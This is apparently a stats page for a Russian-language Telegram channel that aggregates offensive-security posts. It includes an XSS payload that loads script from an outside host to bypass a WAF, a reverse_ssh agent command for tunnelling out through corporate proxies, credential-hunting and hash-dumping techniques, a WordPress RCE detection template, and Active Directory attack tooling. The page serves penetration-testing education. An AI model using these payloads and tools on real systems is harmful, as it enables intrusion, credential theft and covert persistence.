Pentester's Backlog
описание
Агрегатор новостей из мира наступательной безопасности. EDUCATIONAL PURPOSES ONLY
823
подписчиков
Охват к подписчикам
28,6%
ERR
Реакции к просмотрам
0,38%
55 на 49 постов
Пересылки к просмотрам
2,01%
291
Постов в день
0,4
всего 75
Где отзываются чаще
доля реакций к просмотрам- 17 июл.🛠 Всем привет. Я тут допилил CLI-движок для LOLCreds на Go. Называется это безобразие CredsHound. Если коротко, это такая утилита для поиска учетных данных, ключей на хосте, которая работает по концепции Nuclei. Из коробки она ищет: - Пароли и API-ключи, забытые в истории терминалов (.bash_history, .zsh_history, ConsoleHost_history.txt). - Приватные ключи SSH, конфигурации Kubernetes и токены Docker Registry. - Артефакты Windows: пароли из файлов автоматической установки (Unattended XML), конфиги RDCMan и групповые политики с зашифрованными cpassword. - Локальные файлы конфигурации БД вроде .pgpass или .my.cnf. 🐶 Ну и интеграция с собакой тоже есть. Потому что просто выплевывать цветной текст в консоль скучно. 📖 Как запустить: # установка go install github.com/haxxm0nkey/credshound/cmd/credshound@latest # запуск credshound -ut credshound . 🔗 Где исходники, Билли? Движок: https://github.com/haxxm0nkey/credshound Хорошей пятницы вам, держитесь там!1,69%
- 15 окт. 2025 г.Недавно попалось приложение, которое не давало мне проэксплуатировать XSS. WAF тригерился на использование большинства функций и ключевых слов, таких как alert, document.cookie и других. В таких случаях часто на помощь приходит функция import(), которая позволяет подгружать JS-скрипты из внешнего модуля. Более подробно c этой функцией можете ознакомиться в документации. Для эксплуатации я использовал пэйлоад Javascript:import('//X55.is')// который через import() выполняет загрузку вредоносного JS-модуля, размещенного на сайте X55.is. Данный модуль выполняет обычный alert. Кроме того, с его помощью можно удобно выполнить любой код, указав его через символ #. Все, что будет после #, не будет видно на сервере, что поможет обойти WAF, а модуль в import считает содержимое из document.location.hash и выполнит код. javascript:import('//X55.is')//#alert('shdw') #web #waf #xss1,32%
- 4 дек.Cloudflare has recently started blocking proxy tools such as Burp Suite by detecting their unique TLS and request fingerprints. If you encounter this issue, install the "Bypass Bot Detection" extension from the BApp Store. It spoofs Burp’s TLS fingerprint to resemble normal browser traffic and bypass the block. https://github.com/PortSwigger/bypass-bot-detection #bugbountytips1,16%
- 10 мар. 2025 г.У BugBounty-платформы HackerOne утечка всех ее пользователей, включая пароли доступа к платформе 🔠 Так что, если вы пользователь этой платформы, то впору сменить свои реквизиты доступа к системе 🤒 Кстати, как вы думаете 🤔, что можно сделать, если узнать ваш пароль доступа к BugBounty-платформе? Узнать сумму ваших вознаграждения? Получить доступ ко всем вашим отчетам? Вывести все средства на подставные счета? 🤒 Что-то еще? #утечка #bugbounty1,11%
- 29 мар. 2025 г.Подготовил для вас самый большой на данный момент гайд по тестированию CMS Bitrix. 😈 ➡️Причем, в статье я не только показал все существующие на данный момент известные методы и техники поиска уязвимостей в битриксе, но и поделился своими уникальными наработками. Включая атаки на кастомные модули и анонс собственного сканера под CMS Bitrix. ➡️Также добавил материалы по структуре модулей и матчасть по самому Битриксу. Даже если вы только знакомитесь с этой CMS, после прочтения точно что-нибудь найдете)🥤 Ссылка на статью 💫 @pentestnotes | #pentest #bitrix1,08%
- 30 янв.👋 Всем привет! Сталкивались с ситуацией, когда в организации грамотно настроен выход в интернет? Сценарий такой: 🔒 По умолчанию доступ в интернет с хостов запрещен. 🌐 Есть корпоративный прокси-сервер с обязательной аутентификацией. 🤔 Да ещё и только по протоколу Kerberos (Negotiate), и не каждому пользователю разрешён выход. Итак, что делать, если вы получили доступ к хосту от имени доменного пользователя, которому разрешён выход в интернет? Мне сразу же хочется пробросить сессию наружу, запроксироваться и закрепиться тихо и надолго. 😄 💡 Поиск решения Я перебрал много известных инструментов, но не нашёл ничего подходящего. Большинство решений поддерживают только NTLM или Basic аутентификацию, либо вообще не умеют работать с прокси. Пришла идея написать небольшой прокси-сервер-прослойку, который бы принимал соединения без аутентификации и сам проходил её на корпоративном прокси. Но встал вопрос: откуда брать учетные данные? 🛠 Первые шаги Нашёлся старый, но рабочий репозиторий — win-auth-proxy (ссылка). Автор реализовал извлечение дескриптора учётных данных из текущей сессии пользователя с помощью winapi функции AcquireCredentialsHandle, а затем использовал InitializeSecurityContext для аутентификации на проксе. Скомпилировал его, почти ничего не меняя, и — о чудо, всё завелось! ✨ Но тащить два бинаря на хост показалось не очень элегантным решением. 🚀 Идеальный инструмент Тут я вспомнил про замечательный инструмент reverse_ssh (ссылка). Он тихий и поддерживает всё, что нужно: - Интерактивную сессию - Проксирование - Проброс портов - Передачу файлов В общем, всё, что может обычный SSH. Я форкнул репозиторий и добавил необходимые доработки для аутентификации на прокси с использованием текущих учётных данных пользователя Windows. Отдельно стоит упомянуть гибкость транспортов. Инструмент умеет работать не только по чистому TCP, но и заворачивать трафик в HTTP, HTTPS, TLS, WS (WebSocket) и WSS. Это критически важно для обхода DPI и маскировки под легитимный веб-трафик в жестко контролируемых сетях. Позже один молодой эксперт (nollium) доработал инструмент, добавив аутентификацию через NTLM с указанием кредов. Что удобно для запуска, например с linux систем. 💪 Финальный штрих Я столкнулся с проблемой, когда прокси-сервер находится в одном домене AD, а пользователь — в другом. Происходила ошибка из-за неверного выбора realm. Эту проблему я тоже исправил. Чтобы использовать фичу, достаточно добавить флаг --use-kerberos при генерации агента: link --https --name main_agent --use-kerberos --proxy http://proxy.example.com:8080 --goos windows Теперь у нас есть мощный инструмент, который поможет пробить стену! PS. Все изменения уже доступны в оригинальном репозитории. Пользуйтесь на здоровье! #pentest #redteam #proxy #kerberos #ssh #infosec #bypass #auth #negotiate0,94%
- 18 июл.🌟 wp2shell (CVE-2026-63030 / CVE-2026-60137) Online чекер - https://wp2shell.com WordPress REST API Batch endpoint (/wp-json/batch/v1) SQL Injection Unauthenticated RCE Nuclei шаблон: id: wp2shell-batch-exposure info: name: WordPress wp2shell Exposure (CVE-2026-63030, CVE-2026-60137) author: zephrsec severity: critical reference: - https://slcyber.io/research-center/wp2shell-pre-authentication-rce-in-wordpress-core/ classification: cve-id: CVE-2026-63030,CVE-2026-60137 tags: wordpress,cve2026,rce,sqli,wp2shell http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} - | POST /?rest_route=/batch/v1 HTTP/1.1 Host: {{Hostname}} Content-Type: application/json {} req-condition: true redirects: true extractors: - type: regex name: wp_version part: body_1 group: 1 regex: - 'name="generator" content="WordPress ([0-9.]+)"' matchers-condition: and matchers: - type: dsl dsl: - >- compare_versions(wp_version, ">=6.9.0", "<6.9.5") || compare_versions(wp_version, ">=7.0.0", "<7.0.2") || compare_versions(wp_version, ">=6.8.0", "<6.8.6") - type: word part: body_2 words: - '"rest_missing_callback_param"' - '"rest_invalid_param"' condition: or 🔗 Research 🐱 PoC #cve #web #pentest #wordpress #poc ✈️ Telegram 💬 MAX0,89%
- 2 июл. 2025 г.🔄🐍 PowerView v2025.1.0 Python реализация известного PowerView.ps1 скрипта Отличный инструмент при пост эксплуатации 💻 Active Directory Огромное количество возможностей и настроек, умеет в relay Работает быстро и стабильно Различные варианты аутентификации: pfx, kerberos, pth Из последних фишек, поддержка веб интерфейса Рекомендую! 🎩 Установка в uv: uv tool install --python 3.12 git+https://github.com/aniqfakhrul/powerview.py --force Использование: powerview range.net/lowpriv:Password123@192.168.86.192 --dc-ip 192.168.86.192 #with web powerview range.net/lowpriv:Password123@192.168.86.192 --dc-ip 192.168.86.192 --web Некоторые примеры: Add-ADComputer Add-ADUser ConvertFrom-SID Get-Domain Get-DomainCA Get-DomainRBCD Get-DomainTrust Get-NetLoggedOn Invoke-Kerberoast Invoke-PrinterBug Set-CATemplate Set-DomainRBCD 💻 Home 📔 Wiki #powerview #redteam #activedirectory #soft ✈️ Whitehat Lab 💬 Chat0,85%
- 24 июн. 2025 г.#activedirectory #ad #pentest Делаем свои словари для пентеста: берем словарь (тык) + берем скрипт (тык) Возможные шаблоны для генерации: i.s → a.ivanov i_s → a_ivanov is → aivanov si → ivanova s_i → ivanov_a s.i → ivanov.a s → ivanov usage: python3 word_gen.py russian_names/russian_trans_surnames.txt -o wordlist.txt -p s.i,s_i,i_s0,80%
- 6 авг.Дампим SAM/SYSTEM через 7-Zip Знакомая ситуация: вы на машине юзера, нужно достать хеши, но reg save или copy блокируются EDR, файлы заблокированы самой Windows, а антивирус палит известные утилиты. Но на рабочих станциях часто установлен 7-Zip! И у него есть крутая недокументированная фича - прямое чтение диска (raw disk access). А можно использовать и для DFIR извлекать MFT и т.д. Чем проще и банальнее тем лучше : )0,78%
- 7 авг.Пока все обсуждают, когда ИИ заменит пентестеров, мы продолжаем публиковать реальные истории из практики. 🔥 Новая статья — «SSRF 2 RCE». В статье расскажем про цепочку уязвимостей, которая позволяет добиться максимума от SSRF. 📖 Читать: https://blog.deteact.ru/ssrf-2-rce/0,78%
- 24 июл.🔒 Certighost (CVE-2026-54121) — AD CS Domain Controller Impersonation Low-privileged domain user can impersonate a Domain Controller via an AD CS enrollment chase fallback. By supplying cdc (Client DC) and rmd (Remote Domain) request attributes, an attacker forces the Enterprise CA to query an attacker-controlled host over SMB and LDAP. The CA then blindly trusts the returned directory objects (objectSid + dNSHostName of a real DC) and issues a certificate containing strong identity mapping for the Domain Controller. This allows successful PKINIT authentication as the DC. 🔗 Research: https://gist.github.com/H0j3n/a5ef2609b5f2944ac2390a191a534c26 🔗 Source: https://github.com/aniqfakhrul/CVE-2026-54121 #ad #adcs #pkinit #machineaccountquota0,75%